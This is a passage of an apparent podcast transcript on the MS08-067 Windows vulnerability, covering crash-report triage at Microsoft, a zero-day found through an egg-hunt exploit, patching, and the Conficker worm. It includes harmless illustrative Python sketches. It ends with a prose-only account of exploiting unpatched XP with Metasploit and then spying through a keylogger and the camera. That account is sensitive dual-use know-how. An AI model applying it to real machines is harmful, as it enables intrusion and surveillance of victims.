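    return "NEW bucket -> ask the client for a fuller crash dump"

crash = {"app": "winword.exe", "app_version": "12.0",
         "faulting_module": "mso.dll", "offset": "0x2af3"}
print(triage(crash))  # NEW bucket -> ask the client for a fuller crash dump
print(triage(crash))  # known bucket, count bumped
```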

Now, remember, I said that XP had 45 million lines of code, and a program that big is impossible to keep bug-free. And I don’t think it’s just a dozen bugs in a program that big. I don’t even think it’s just hundreds of bugs or thousands of bugs. I think there’s more like tens of thousands of bugs in a program with 45 million lines of code in it. At the same time, Windows was installed on a billion computers in 2008. So Microsoft was seeing millions of crash dumps a day from these computers. So let’s try to be a project manager for a second here and come up with a strategy to tackle these millions of crash dumps a day. We have a few options. First, let’s just filter out all the known bugs we’ve already fixed. People’s computers are crashing, but they just need to patch and it won’t crash anymore. Okay, that’s out of the way. But now, when we try to prioritize what to look at next, it’s not so easy. It might make sense to tackle the bugs that show up the most, but these might be very low severity, maybe not as important. Maybe there’s something with a higher severity but not as many crash reports. So then you might decide to look at the highest-severity crash reports instead. Or maybe some apps are more important than others. Like if MS Paint crashes, it might not be as big of a deal as if the whole computer was crashing. Or maybe you can look at the easiest-to-fix problems first, get those out of the way. It’s really hard to know what to prioritize here. So this might give you a better understanding of how hard it would be to look through millions of crash reports a day to figure out what to fix first. But it was still very important for Microsoft to collect these dumps and analyze them. At this time, in 2007, John was starting to look at these crash reports to try to make sense of them.
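And here is that project-manager thought experiment as a sketch: drop the buckets that are already fixed, then rank the rest by a crude severity-weighted volume score. The fields and weights are invented for illustration:

```python
# One way to rank crash buckets for triage: filter out fixed issues,
# then score severity x frequency. Real prioritization would also weigh
# app criticality and exploitability; this is deliberately simplistic.
fixed = {"bucket-017"}
buckets = [
    {"id": "bucket-017", "app": "mspaint.exe", "severity": 1, "hits": 90_000},
    {"id": "bucket-204", "app": "svchost.exe", "severity": 5, "hits": 1_200},
    {"id": "bucket-389", "app": "winword.exe", "severity": 3, "hits": 40_000},
]

triage_queue = sorted(
    (b for b in buckets if b["id"] not in fixed),
    key=lambda b: b["severity"] * b["hits"],
    reverse=True,
)
for b in triage_queue:
    print(b["id"], b["app"], b["severity"] * b["hits"])
# bucket-389 winword.exe 120000   <- gets looked at first
# bucket-204 svchost.exe 6000
```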

They go up to a massive automated system. These tools run against them at scale in a completely headless way. They are sort of bucketed and binned in a way that makes it easy for engineers to know, is there something new coming along, or how active, how prevalent is this issue? A wide variety of engineers across the company use it. If you work on Office, you look in the Office crash buckets and see what is hot for you there. If you work in Windows or any other product, you can kind of see, how is my product crashing? So engineers across the company were using this to fix bugs. And then, for example, in Windows Vista, from the Trustworthy Computing side, they ran all kinds of static analysis tools to find and remove reliability issues.

And I think they fixed a hundred thousand bugs through those efforts. And through Windows Error Reporting, they found another 5,000 bugs that had escaped all of those processes, which they went in and fixed. And so every service pack, every new product from Microsoft is more reliable, because they’re finding and fixing all these bugs that are manifesting in the wild. I was there kind of on the side saying, this is a fascinating telemetry system. How do we look at this from a security point of view?

He said a hundred thousand bugs.

One hundred thousand changes to the product that were done. Because not all of those are bugs. One way to think about it is, there are coding practices that are sort of outdated. Developers will know about these things, like calling these unsafe string functions like strcpy and so forth. And instead of trying to figure out which ones are vulnerabilities and which ones are not, they said, let’s just go remove all of them from the product. And so that’s a massive amount of code changes. You know, many of those are not bugs. Many of those are not vulnerabilities.

But it’s an easy way to just go say, look, we’re gonna have a new standard of engineering where we go get rid of that whole class of thing by tackling that. So that’s an example of some of those changes. Yeah. But I mean, are you exaggerating when you say one hundred thousand, or...? No. No.

Jeez. Can you imagine trying to keep something like this secure? To fix a hundred thousand things in the code just sounds like madness to try to complete. I guess this is why they needed ninety-one thousand Microsoft employees to tackle huge issues like this. These crash reports were really helping them identify the problems that needed fixing. But even though these might be bugs, they might not all be security problems. Like if you click print and nothing happens, that might be a bug in the code, but is it really a security issue? A hacker probably can’t use that to take control of your computer or hack you. But John was looking at this and wondering if there is anything in these crash reports that a hacker could use, or maybe signs that a hacker caused a crash.

Some vulnerabilities are discovered by attackers and exploited in the wild before Microsoft is aware of them. And how could we go find that before customers contact us? There are a lot of reasons that exploits actually fail in practice. And that was the idea, which is, instead of trying to find exploits when they’re working, sometimes they don’t, and there’s a bunch of interesting reasons why they don’t. And by studying the causes of failure of those exploits in the wild, that would lead us to potentially discover them. Some of the reasons they fail are because the exploit was written for, say, an English-language version of Windows and it’s run on a Chinese-language version, and they’re slightly different internally. So for a wide variety of reasons, exploits would fail in practice. And I studied extensively all the different patterns of how they fail, because that was what I needed to be able to understand to find them.

The hunt was on for John. He wanted to find traces of hackers in the WER logs. But like I was saying, there are millions of error logs a day. This wasn’t gonna be easy.

Yeah, I mean, I think back then it was over a billion a month, and I recognize, it’s like, how could you look through a billion a month? Because of the way Windows Error Reporting buckets the issues, you don’t have to look at every single one, one by one. You’re really trying to find new ones, new ones that are interesting in a different way. And then another way to think about it is, there’s only a certain number of ways that zero-days are going to kind of show up and affect an application. And so, you know, people can send malicious documents that’ll crash Word. So Word is interesting to look at. People can send exploits with the browser, so Internet Explorer would be interesting to look at. And then if you think about even inside of Microsoft Word, if an attack is going to happen, likely it’s going to happen when the user is first opening the document. You know, it’s rare that some exploit is designed to work when the user’s been in Word for an hour and they finally click Tools, Options, Spell Check, Add-in, and then it goes boom. Those are not the paths where an exploit is going to work. It’s gonna be in the file-open code path. So that further narrowed down the places that we needed to look at. Then exploits fail in certain specific patterns, the kind of patterns that we sort of knew to go sifting for. So we were able to work that funnel down from a billion reports a month to, you know, millions that seemed interesting, to hundreds of thousands that had no other clues in them, and so forth, and whittled the funnel down.

John dedicated a lot of time to try to find this unknown vulnerability that some hacker was exploiting.

And when we come back from the break, John finds something that he’ll never forget.

Working remotely can be a challenge, especially for teams that are new to it. How do you deal with your work environment being the same as home while staying connected and productive? And then there’s your newest co-worker, the cat. Well, your friends at Trello have been powering remote teams globally for almost a decade. At a time when teams must come together more than ever to solve big challenges, Trello is here to help. Trello, part of Atlassian’s collaborative suite, is an app with an easy-to-understand visual format, plus tons of features that make working with your team functional and just plain fun. Trello keeps everyone organized and on the same page, helping teams communicate, focus and connect. Teams of all shapes and sizes at companies like Google, Fender, Costco and likely your favorite neighborhood coffee shop all use Trello to collaborate and get work done. Try Trello for free and learn more at trello.com. That’s t-r-e-l-l-o dot com. Trello.com.

On September 25th, I remember opening a crash report for the service host (svchost) process, which we had seen many millions of crash reports for already, because a couple of years earlier there was this other vulnerability, MS06-040, that had been adopted by bots and worms to spread, and it was causing millions of crashes on machines that had not put on that patch. But this one was a little different.

So first of all, it had an exploit. It had exploit code in it. Okay, that didn’t mean it was new; it could be an old one. It had exploit code on the stack, which is a critical part of memory, which tells you that the exploit was trying to be activated. Now, it had a difference in it, what I call an egg hunt, which was an exploit technique that I had never seen before in any exploit of MS06-040. So this was either a new strain of that or something new for that service host. An egg hunt is an exploit-writing technique where, like, as the bad guy, imagine you’re going to go scale a wall, and you put all your attack tools, your thieving tools, in a bundle and you throw it over the wall, and then later you go scale the wall and go get it. An egg hunt breaks the exploit into two pieces to serve a purpose, and this crash had that technique in it. So that alone drew my eye to look at it. And then the odds of there being a buffer overrun and exploit in the same area as MS06-040 just seemed unlikely. And yet I felt like if it was new, this was really important. And so I just tried to stick with it and do what I could to rule in or rule out whether this was new. And one of the most stubborn clues was in the crash report. It has information about every DLL that is loaded into it, and the vulnerable DLL, the one that had MS06-040, was loaded in it. That is netapi32. And the version information told me it was fully patched. So it clearly could not have been exploiting that vulnerability, because that vulnerability did not exist in that version of the product.

John looked at the logs here, and it looked like a hacker was exploiting two pieces. One was basically injecting some hacker tools into the system, hiding an egg, if you will. And the other was going in and using those tools. A strange combo. But like John said, it was sort of like throwing your tools over the fence and then jumping over the fence to get them. The two pieces in play here were svchost, the service host, and netapi32.

Yeah. So sometimes when you are writing an exploit, you have constraints that you have to work within. And once your exploit starts to run, you have a number of steps as the attacker you’re going to want to do. Typically, that involves downloading some external piece of malware to that system and then launching that, and then the rest of your attack. Then you’re resident on that computer and you can do whatever attacks you want to do further from there. But you have to get it going. And sometimes that shellcode, as it’s called, can’t fit within the constraints of the vulnerability; the buffer it needs to fit in, for example, is just too small a box to package all those instructions. And an egg hunt is a technique that is designed to solve that by first sending over some data and interacting with the vulnerable program in a way that doesn’t use the vulnerability at all. It just tries to get data in memory, that bag of tools, that shellcode, that they are going to use later. And then the only thing that they need when they actually run the attack is a very small piece of shellcode that basically goes and searches memory to find that bag of tools.
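Here is a harmless simulation of that two-stage idea, no exploit code, just the search step: stage one stashes a tagged payload somewhere in a buffer, and the tiny stage two scans for a doubled tag to find it. The tag value and layout are made up:

```python
# Harmless simulation of the egg-hunt idea: stage one plants a payload
# ("bag of tools") in memory behind a doubled marker (the egg); stage two
# is tiny and only has to scan memory for the marker.
EGG = b"\x90\x50\x90\x50"    # arbitrary 4-byte tag, written twice below

memory = bytearray(4096)     # stand-in for the target process's memory
payload = b"...big second-stage tool bundle..."

# Stage 1: innocuous-looking traffic stashes the payload at some offset.
offset = 1337
memory[offset:offset + 8 + len(payload)] = EGG + EGG + payload

# Stage 2: the few bytes that fit in the overflowed buffer only need to
# walk memory until they find the doubled tag, then jump to what follows.
# (Doubling the tag keeps the hunter from matching its own single copy.)
def egg_hunt(mem, egg):
    pos = mem.find(egg + egg)
    return None if pos < 0 else pos + 2 * len(egg)

start = egg_hunt(memory, EGG)
print(memory[start:start + 20])   # b'...big second-stage '
```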

What a tricky exploit. And because there are two parts to it, it’s really hard to find. The more John looked at this particular crash report, the more he started to realize this was actively exploiting an unknown vulnerability in Windows, which makes it a zero-day bug.

This, in a way, was the hardest moment of this entire thing for me, because I clearly had enough evidence to say this was a new attack, a new vulnerability that we did not know about. But to get the company to act, you need to actually pinpoint the vulnerability. We have to know what’s the code that’s wrong; otherwise, nothing can happen. And I pored over the code and pored over the code, and I could not figure it out. At one point, I decided the clock is ticking, this is a potentially really bad situation, I’ve got to go ask for help if I’m going to figure this out. And I walked over to the office of Andrew. Andrew was a colleague of mine. We had worked together previously, actually. Andrew had looked at many crash reports for security objectives for a long time, and he knew what this hunt was like, which is, in a lot of ways, it can be a very frustrating hunt. You can spend hours looking at something you think is real and then it’s not. And so what I wanted was to hand this to one of the MSRC engineers and have them go figure this out. And he was reluctant to take an engineer off of an existing confirmed vulnerability that somebody else had reported and was in the middle of, to go potentially chase a ghost. So he took it on, took a look at it, I think in his mind saying, look, this is a false positive, this is not a real issue, and case closed. And so there was some tension in the air, with me really pushing a busy team to go look at something that likely was not going to pan out, but I felt like it could be important enough that it’s worth doing, and Andrew wanting to protect his team but do the due diligence to make sure we got the answer right.

So Andrew got a copy of this crash report and the code for these processes. And he started analyzing all this. He spent a couple of days looking it over and working on it, trying to find what the crash report means. There’s an egg somewhere in the code, but neither of them could find it. But this error report did say that there was something causing a crash. Now, keep in mind, John had only seen one crash report from this. This wasn’t a widespread issue. So both John and Andrew weren’t entirely sure how much effort they should spend in looking for something that only happened once on one computer. But if there was an unknown vulnerability, both John and Andrew wanted to find it and fix it.

So Andrew kept looking.

And then at one point he stops by my office and the look on his face told me everything.

The look was the look that a security researcher has when they’ve found something. There’s a goofy, happy smile that is also full of holy cow, I can’t believe how serious this thing is that I just found.

He said, I found a vulnerability. And when I heard that, I knew the next two weeks of my life were going to be completely different, because this vulnerability was in an area that would allow an Internet worm to be written against it.

The vulnerability they found allowed an attacker to take remote control of a Windows computer. No need for a username and password, no need for RDP to be enabled or anything like that. Just give me full control of that computer, and now I can issue my own commands on it, see any files, do whatever I want on that computer as if I’m right in front of it. And of course, to top it off, it’s a vulnerability in a fully updated version of Windows. In the security world, we call this kind of vulnerability an RCE, which means remote code execution: a hacker can execute whatever commands they want on the victim’s machine. And this is the worst kind of vulnerability. It’s the most critical, the most severe, because you absolutely never want just any Joe Schmo executing commands on your computer, even one with its full defenses up. If you can run whatever commands you want on someone else’s computer, it pretty much means it’s your computer.

But to top it off, as if this highly critical and severe vulnerability wasn’t enough.

This exploit was wormable. Wormable means that you have a vulnerability that an attacker can write an exploit for, and it can propagate across the internet, exploit that vulnerability, and then turn around and continue to repeat the process and propagate further. So it becomes a viral outbreak, and it is the most damaging, devastating, disruptive kind of attack that can take place. And the world has seen many worms, in the form of Blaster, Code Red, Nimda, Slammer, Zotob. And we knew how devastating these attacks can be. Entire businesses are disrupted. Systems are taken offline. Network traffic gets clogged with worms replicating out of control, using up all available bandwidth. And so we knew what the potential was. We didn’t think that had been happening yet, but we knew it was possible.

So when Andrew came to John’s office and told him this vulnerability was real and wormable, the two immediately jumped up and sprang into action.

So Andrew and I both are on the engineering side, and we knew we needed to go activate the crisis response part of Microsoft.

So he and I immediately leave my office. We walk down the hallway to the office of the crisis manager. His name is Philip. Philip has worked on many of Microsoft’s most important security crises, and he is chatting in his office with a colleague. We show up. He knew that wasn’t a good sign. We look at Philip and say, we need to talk. He looks at his colleague and says, I’ll talk to you later. And then I said, we have a zero-day.

And he just knew by the two of us showing up in that fashion that something bad was happening. I mostly have two emotions going on. One is, we need to get all of Microsoft engaged on this that can do something about this. So that is an impetus to go make sure you’re informing people so they understand the severity right away and they can begin the mobilization process. And then the other side of me was, what is really going on out there? I have one crash report. I don’t know if there are a hundred thousand out there just like this, and this is a worm that is raging across different parts of the world, or this is something that’s just getting started.

So I immediately wanted to go and get some better situational awareness about scope and scale, to know what we were really dealing with.

John and Andrew briefed the crisis manager on what was going on: that a very serious, wormable, extremely critical vulnerability was present in Windows and needed to be fixed immediately. And while they found this in Windows XP, the vulnerability existed in more than just XP.

Yes. And it affected every version of Windows that we had at that point. So Microsoft has a crisis response process that they invoke when one of these things occurs. It’s called SSIRP internally. A conference bridge is stood up, and all of the crisis partners across the company join that call, and then Phillip would take them through: here’s a summary of the situation. And generally speaking, if there’s a vulnerability in Windows, you know, teams know what to do. This one would involve a lot more teams, because they had to be ready for customer support calls. If there’s an attack, what does the malware, the threat side of it, look like? And the anti-malware team will start building signatures for that. We knew we had to prepare data for all of the security partner companies, Symantec, McAfee and whatnot, for them to help go protect their customers and the ecosystem. And then the engineering team needs to go: OK, what do we have to do to fix this vulnerability? And are there any others just like it waiting there that we need to fix at the same time, so we get the patch done right?

A huge conference call was set up with pretty much someone representing all the different departments of Microsoft. The goal was to get everyone engaged in helping solve this as quickly as possible. This vulnerability was much more severe than any of the others they had found.

Once I knew that the right people were engaged and working to get the right patch out the door, the thing I could go help on was: how often is this happening, and where is it happening? I called that dialing into the crash buckets, to find any information I could about how often this was occurring. Then I was able to bring that situational awareness back to the crisis response and say: OK, I saw it five more times today. It just spread from Malaysia to Japan to Singapore to whatnot. And they could get a sense of: OK, it’s the same attack payload communicating with the same IP address on the internet to pull it down, but it’s spreading from geography to geography to geography. So it didn’t look like a worm, but it looked like some set of hackers that were going around using this tool across a variety of targets, expanding its scope every single day.
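For a flavor of what that “dialing into the crash buckets” triage could look like, here is a purely hypothetical sketch: it tallies crash reports matching one attacker’s fingerprint (the same payload server) by country. The field names, records, and IP addresses are invented for illustration; Microsoft’s real Windows Error Reporting pipeline is internal and far more sophisticated.

```python
# Hypothetical sketch of crash-bucket triage: count crash reports that
# match one attacker's fingerprint (same payload server), per country.
# Field names and records are invented; real WER telemetry is internal.
from collections import Counter

crash_reports = [
    # (country_code, payload_server_ip) stand-ins for real crash metadata
    ("MY", "203.0.113.7"),
    ("JP", "203.0.113.7"),
    ("SG", "203.0.113.7"),
    ("JP", "203.0.113.7"),
    ("US", "198.51.100.2"),  # unrelated crash, different fingerprint
]

def crashes_by_country(reports, attacker_ip):
    """Tally crashes tied to one attacker's payload server, per country."""
    return Counter(country for country, ip in reports if ip == attacker_ip)

print(crashes_by_country(crash_reports, "203.0.113.7"))
# Counter({'JP': 2, 'MY': 1, 'SG': 1}) -> same payload IP, new geographies
```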

See, that’s fascinating. So somebody knew this vulnerability. They found this before Microsoft did and were using it. And this wasn’t just some accidental bit flip or something that caused the crash report; somebody had actually coded this and was using it in Asia.

That’s right. So somebody found this vulnerability, probably got the bonus of the year for finding it, and then it was weaponized. And then some group, unknown to this day, was using it in those geographies where we saw these crash reports coming in. And the tool was not completely reliable, so that’s the crashes that we’re seeing; that’s when it failed. But obviously it worked and succeeded a bunch of the time. And I didn’t know how often: for every crash, is that one in a hundred times that it’s crashing, or is it one in a thousand? What shadow of the real activity am I seeing? That was an unknown that we were working against.

But I could use this to get a sense of its spread, its reach and its pace. Now, this became a top priority for the development team to fix. They dove in and fiercely started to rewrite the code to fix this problem.

And they did. They fixed the vulnerability. But this is not the end of our story. No, no, no, no, no, no. This is just the genesis. And stay with us, because after the break, we’ll hear how this went on to become one of the most notorious bugs ever to be found in Windows.

Support for this episode comes from ProCircular. Now, even though vendors make patches available for us to update our computers, patching is still really hard. It requires juggling files and scheduling reboots, and doing all that at scale against all your computers can be a nightmare. No wonder MS08-067 was a problem for a whole decade. ProCircular has helped hundreds of clients slay that dragon. It’s all about adding security in layers, and they’re really good at helping with all the details of getting your network secure. They have a team that can help your business with patching and vulnerability management, doing some monitoring that actually works, penetration testing to verify it’s actually secure, and incident response in case things do actually go bad. Whether you’re just getting started or looking to move to the next level at securing your business’s network, ProCircular has the people and resources to help you get there. ProCircular will help you confidently manage your cybersecurity risks. Visit www.procircular.com. That’s www.procircular.com.

Now that a fix was written and a patch was ready, a decision had to be made about how to release this to the world.

Right. So there’s a decision point as part of this response process, which is: OK, when is the patch going to be ready? And the ideal time to release a patch is on Patch Tuesday, because every I.T. team in every company knows on the second Tuesday of every month there’ll be a set of security patches from Microsoft. And they know to organise their patching of their fleet of systems and take their downtime and their maintenance time to go put them on. And they know some of them will be severe and they should do that right away. So I.T. teams are best ready to consume those updates and put them out at that time. The other option is you just ship it when you’re ready. We call that going out of band. That gets the solution out there sooner, but at the same time, none of those I.T. teams are necessarily ready and poised to go grab it. And here we had a situation where there obviously was an attack happening in the wild that we wanted to stop, but we knew as soon as we put this out, copycat attacks would happen by people reverse engineering the patch and understanding it, and that would spawn a whole other wave of attacks. And so there was this weighing of: if you go out of band, you could spawn a bunch of copycats of a very damaging vulnerability when I.T. teams are not ready to go put the patch on, and there could be more victimization. The bottom line in terms of our calculus was: this was a very severe vulnerability, it was wormable, it affected every version of Windows, we had a solution, and we went out of band.

This vulnerability was so severe that they decided not to wait until Patch Tuesday and just pushed it out as soon as it was ready. This patch went out in 2008, and it was the sixty-seventh patch of the year, which famously made this MS08-067.

Yeah. So there were two interesting things that happened after we went out of band. The first one was about that attacker. I was seeing crash reports still coming in every day until we went public. As soon as we went public, that attacker disappeared, and I never saw him again.

And how can you trace that? I mean, do you have like a signature for certain machines that kept getting attacked?

Well, there were attack details hidden in there. For one, the shellcode and the egg hunt (an egg hunt is a small first-stage shellcode that searches memory for a marker, the “egg”, in front of the main payload) were kind of a fingerprint that was consistent across all the crashes I had gotten to date for this issue. All of them were contacting the same IP address of a server in Japan and downloading a payload from it. And so all of that was consistent.

And then the day the patch goes live and we announce it, I see no more crash reports from this. There’s this period where, for a number of hours or a day, nothing’s coming in anymore. And then we start to see new crash reports for the same issue that were clearly security companies reproducing this vulnerability. They’d reverse engineered what we fixed in the patch and were writing their own proofs of concept to crash it. Not writing exploits for it, just probing the vulnerability to make sure they understood it. And we started seeing those crash reports come in from the security researcher side. And soon enough, a few days after that, we started to see the first wave of new attacks, clearly different and new from the original ones, that looked like bots or botnet programs adopting this as a spreading mechanism. And we started to see that wave as well.

See, this is what I mean by this being only the genesis. Now that the patch was out there, both white hat and black hat hackers analyzed it to figure out what this exploit was and how to run it, which means this tool went from being used by a single hacking group somewhere in the world to being known by the general hacker community. And within a short time, it would become available for anyone in the world to just download and use.

Isn’t that a strange decision to have to make, though, knowing that if you put a patch out, it reveals the vulnerability to the world for any hacker to use? But Microsoft has a duty to make secure products, so they absolutely have to release the patch whenever they find a vulnerability like this, because it has far-reaching effects on helping people stay secure.

In the first week, it was on Windows Update, and within seven days I think we had patched 400 million machines.

This is sort of the awesome part about Windows Update. It’s a system that had been built to patch the Windows ecosystem at scale, and this is one of those times when you really needed it. And it came through in terms of our ability to essentially inoculate a huge swath of the world against this vulnerability in a very short period of time. It was very effective at that.

It’s hard to know for sure, but my best research tells me there were about one billion Windows computers in the world at that time, and this vulnerability affected all of them. So having 400 million of them patched in the first week was a huge win for helping the world become more secure: 40 percent of the Windows computers in the world were no longer vulnerable to this right away. That’s awesome and amazing.

So all of this was in October. And sometime in early December, the Conficker worm, which had been a sort of small-scale thing for a time, adopted this vulnerability as a spreading mechanism, and then it began to use it against systems around the world that had not put this patch on yet.

And if you think about it, even if only one percent of the Windows PCs in the world don’t patch, that’s still millions of systems.

And a lot of damage was done by Conficker; it was significant. Imagine what would have happened if it had half a billion more PCs that were vulnerable and not patched against this issue.

Conficker was the first big attack to use this exploit. Just months after John discovered this vulnerability, Conficker figured it out and used it to arm itself to infect Windows machines. Because the vulnerability in MS08-067 was so effective, Conficker spread rapidly, ultimately infecting computers in over 190 countries. It would eventually infect millions of computers. Conficker was spreading in a terrible way. I mean, think about how horrible this is: some hacker group with full control of millions of Windows computers worldwide. I’m talking about government agencies, businesses, at-home PCs. The hackers could see all the files on them, run any commands they wanted, install keyloggers, take screenshots, install rootkits, or do whatever they want on these computers.

It’s so frightening to think about. Conficker continued to spread, seemingly unstoppable. By January, 30 percent of Windows computers still had not applied the patch to protect themselves from MS08-067 and Conficker, which means hundreds of millions of computers were still vulnerable to this. Conficker had a field day with everyone who didn’t bother to patch, and eventually was able to infect 10 million Windows computers worldwide, as far as I know.

This makes Conficker the largest worm ever. All thanks to MS08-067.

It was disappointing, but at the same time a strong lesson, because we put the patch out, right?

The job is done. It’s time for the world to put the patch on their systems. That’s the step they have to do. There isn’t anything further we thought we could do. And yet, look what happened and what came after that: all of this damage from Conficker. Now, Conficker had other ways to spread, through USB drive infections and scanning file shares and so forth. But still, there was a large part of the world that had not patched against this vulnerability. And it was a bit of a lesson in just how damaging things can become and how much of the world can be exposed to these attacks even once we think we’ve done our part of the job.

It’s fascinating to me that John was the one who decided to take it upon himself to look at that crash report and discover this. If it wasn’t for him, who knows how long this would have stayed out in the world before being discovered?

Yeah, I think, you know, these operators using this tool thought they had a really great new attack, and if it had been more reliable, we might not have seen this for potentially years, you know, if they were stealthy and choosy about how they used it. Sometimes these zero-day exploits we do learn about have been in use for years in very disciplined ways. The noisier operators are with it, the more likely it is that some victim is going to find out about it, somehow get a whiff of how the attack is working, and the thing can get patched. But, you know, I think if we had not seen this one in this way, very likely this operator could have continued for a very long time with it.

This makes me think about how stealthy some hackers can be. I mean, imagine if the hackers had disabled WER or blocked all connections to Microsoft. That would have been an effective technique to keep Microsoft from seeing these crash reports and discovering this. But maybe that’s going too crazy with it. But see, sophisticated hackers take extreme measures to hide their tracks. I mean, that’s almost one of your adversaries, right? These APTs, like the NSA? It’s like you’re battling with them, like it’s an arms race between you as the vendor and them as the aggressor.

Do you feel that way? It does feel like that in some ways, sometimes, in the sense of: there are people that have weaponized vulnerabilities and are using them in the wild, and on the other side are the defenders at Microsoft, Google and other companies. I don’t care who these people are or why they’re doing it. We just want to find what they’re doing and take those tools away from them. And so every time a zero-day is found in the wild by some defender organization and it gets patched, that is a happy day for me.

What a strange thing to think about. Does that put you in deep thought, too?

I mean, the truth of the matter is that the NSA is actively looking for vulnerabilities in Windows so that they can use them against their adversaries. And then here’s John, actively trying to figure out what the NSA is up to, so he can basically expose their secret weapons. I don’t know what to think about that. I don’t know who the bad guy or the good guy is in this. The NSA is supposed to be working towards keeping our country safe, but at the same time, they have to develop cyber weapons to attack other nations. So it almost seems like the NSA would see John and Microsoft as the enemy, and John might see the NSA as the enemy.

And I just never thought about how these two would be battling each other like this. It’s just wild to think about this relationship.

Yeah. And in many ways, I feel like I relived this whole moment a couple of years ago, when the EternalBlue exploit was discovered. This is one of these NSA tools that the Shadow Brokers group leaked onto the internet. A patch was produced for it; that was MS17-010. And a couple months later, the WannaCry worm was unleashed and spread in a very similar way. It had a more destructive payload and ran across the globe against systems that had not patched.

Now, if you recall from earlier episodes, the NSA actually did tell Microsoft about EternalBlue just before the Shadow Brokers published it to the world, giving Microsoft an early warning, so they were able to move quickly and patch it before it was released. I’m guessing the NSA knew it was going to be published and wanted to help the world.

Just stay slightly ahead of the game. But that must have been an awkward phone call or whatever for Microsoft, to get the memo that the NSA has found a devastating exploit in Windows, and this exploit got leaked to the Shadow Brokers, and they’re about to leak it to the world. Now, I don’t know. It’s a weird, tangled mess when you get into the relationships between the NSA and Microsoft. And just to be clear, there’s no evidence that MS08-067 was found by the NSA.

Oh, and something happened last week that’s kind of interesting, too. Last week was Patch Tuesday, and boy, was it a doozy. There was a bug patched, a cryptographic API bug in Windows 10, which basically allows an attacker to pose as someone they aren’t, and your computer would trust the information sent to it. But here’s the thing: this bug was reported to Microsoft by the NSA. In fact, it was so important the NSA even held a press conference to urge people to patch. This is very rare. I mean, we don’t know how many times the NSA has reported bugs to Microsoft. They could be doing this all the time. But we do know for sure there were two times they did it: once when the Shadow Brokers got the NSA exploits, and now again last week. The NSA says they told Microsoft because they want to build more trust with people and help keep computers secure. Really, it could be that the world is changing and new things are happening, and the NSA might be doing this more now to try to keep the country safer by working with vendors to get things patched. And in fact, they have done stuff like that for a while, but it’s all been small potatoes versus the God-mode bugs that the NSA keeps to themselves. So my theory is this: the NSA gave this bug to Microsoft. Why? Maybe it was just to build better PR. OK. But then maybe the NSA knows something we don’t. Like maybe they uncovered a huge man-in-the-middle campaign that some foreign government was running against many Americans and thought it could have devastating results, so this was their way to stop it. Or maybe the NSA lost another exploit and didn’t want their enemy to have it. I don’t know, but I have a feeling there’s more to this story.

So back to Conficker; you might be wondering what happened there. Like I was saying, Conficker infected 10 million computers and was growing. However, it was a mystery what Conficker actually did, who made it, or what it was supposed to do. While it was infecting systems worldwide, it was apparently not doing anything. Once a computer was infected, on a periodic basis it would reach out to certain domains to receive instructions on what to do next, but it just never got any instructions. Security teams all over the world feared that maybe the instructions would come on a particular day. And in fact, for some weird reason, we thought that on April 1st, 2009, there was gonna be some big surprise that Conficker was going to give us. I remember being in the office that day, setting up a conference bridge in a war room with everyone from I.T., looking for signs of Conficker kicking up or something. But nothing happened. A few companies got really fed up with Conficker spreading everywhere, so they decided to do something about it. In February 2009, something called the Conficker Cabal was formed.

This included people from Microsoft, Verisign, Neustar, America Online, Symantec, F-Secure, researchers from Georgia Tech and the Shadowserver Foundation, and many more organizations. It was a huge list of companies that came together to figure out a way to stop Conficker. They would do things like reverse engineer Conficker to see how it worked and then write fixes to block it from spreading more. But then whoever made Conficker would change how it was infecting machines so it could keep going, creating a new variant of the worm. It became a game of cat and mouse, with the security professionals blocking it and the worm creator getting around that. At some point, Microsoft said they were willing to pay two hundred and fifty thousand dollars for information that led to the capture of whoever created the Conficker worm. They were taking this pretty seriously. The FBI got involved, and the hunt began for whoever was running this worm. The author Mark Bowden did some extraordinary research into this worm in his book, which is just titled Worm. He writes that there are a few theories on what Conficker was.

One is that it was just a security researcher playing around, making a crazy worm, never intending to do any harm with it, just trying to see how big it could get. Another theory was that a government created this worm and it was waiting for instructions to maybe attack on command or spy on people or something. But as more organizations joined the Conficker Cabal, more effort was put into looking into this, and they may have found the answer.

They reverse engineered the code and did everything they could to trace it back to its creators. And they handed this information over to the FBI, who then arrested three Ukrainians: Sergei, Yevhen and Dmitri. These Ukrainians were all millionaires. They drove black Porsches and lived in penthouse apartments. Their story was that they ran a website, with employees and everything, and they paid themselves, but they weren’t paying themselves very much. And so they were arrested on tax evasion charges, and the feds seem to have found some evidence of Conficker code on their work computers. But I don’t think we have any idea what happened to them next. It doesn’t seem like the FBI was able to extradite them to the U.S., and they just disappeared into the Ukrainian courts.

But the FBI also arrested one other guy, a Swede named Mikael. Mikael was arrested in Denmark in connection with this and extradited to the U.S. The court records don’t say anything about Conficker, though. Instead, the FBI found evidence that Mikael was infecting computers and putting scareware on them. This is where he would infect a computer and say there’s a virus on it and you need to buy this antivirus. But when the victim buys the antivirus, nothing actually gets fixed.

The FBI claims Mikael made $71 million from his scareware campaigns, which is a really big haul; to get that much, you must have a lot of infected machines. And there was evidence in some of the variants of Conficker that it was capable of running scareware. So it might have been getting ready to launch a big campaign to do just that, but it never did. Mikael got two years in prison for the scareware scams he was running, and it’s alleged that he had ties to those Ukrainians who were also arrested over Conficker. So it seems like the best theory now is that Conficker was made by a group of Ukrainian cyber criminals who may have been planning on using it to send spam e-mails or run scareware to scam its victims, but they never got to it.

And what’s truly fascinating about Conficker is that it’s still out there, infecting a ton of systems. Even though MS08-067 was patched in 2008, there are still computers out there running systems older than that which still haven’t been patched. The latest estimate is that Conficker is still present on 400,000 computers today.

MS08-067 will go down in history as one of the most notorious vulnerabilities in Windows ever, and the reason is how effective it is. I personally love playing around with this vulnerability and exploiting Windows computers with it, because it’s so easy to do, and I want to walk you through how I’ve done it. First, you need a version of Windows from before 2008, which is actually quite easy: you just install Windows XP on a computer and don’t patch it. This will be vulnerable to it. Then you need to run the exploit against it. Now, instead of knowing what shellcode to send to the computer and working all that out, there’s a crazy shortcut. It’s called Metasploit. Metasploit is an incredible hacking framework and has over a thousand exploits, all pre-programmed and ready to run. So you pick the MS08-067 exploit, point it at your Windows XP machine, type run, and boom, you’re in. And when I say you’re in, you’re really in. Metasploit has tools to allow you to use that computer you just exploited as if you’re right in front of it. You can run any command you want on that computer through the command line, take screenshots of the desktop, enable the camera, run a keylogger to watch what someone types.

